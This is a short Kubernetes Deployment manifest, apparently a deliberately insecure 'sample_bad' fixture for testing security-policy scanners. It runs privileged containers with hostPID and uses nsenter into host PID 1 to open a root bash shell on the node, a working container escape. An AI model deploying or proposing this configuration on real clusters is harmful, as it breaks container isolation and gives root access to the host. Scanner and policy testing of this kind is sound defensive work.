apiVersion: apps/v1
kind: Deployment
metadata:
  name: priv-and-hostpid-exec-deployment
  labels:
    app: sample_bad
spec:
  replicas: 2
  selector:
    matchLabels:
      app: sample_bad
  template:
    metadata:
      labels:
        app: sample_bad
    spec:
      hostPID: true
      containers:
      - name: priv-and-hostpid-exec-deployment
        image: ubuntu
        tty: true
        securityContext:
          privileged: true
        command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
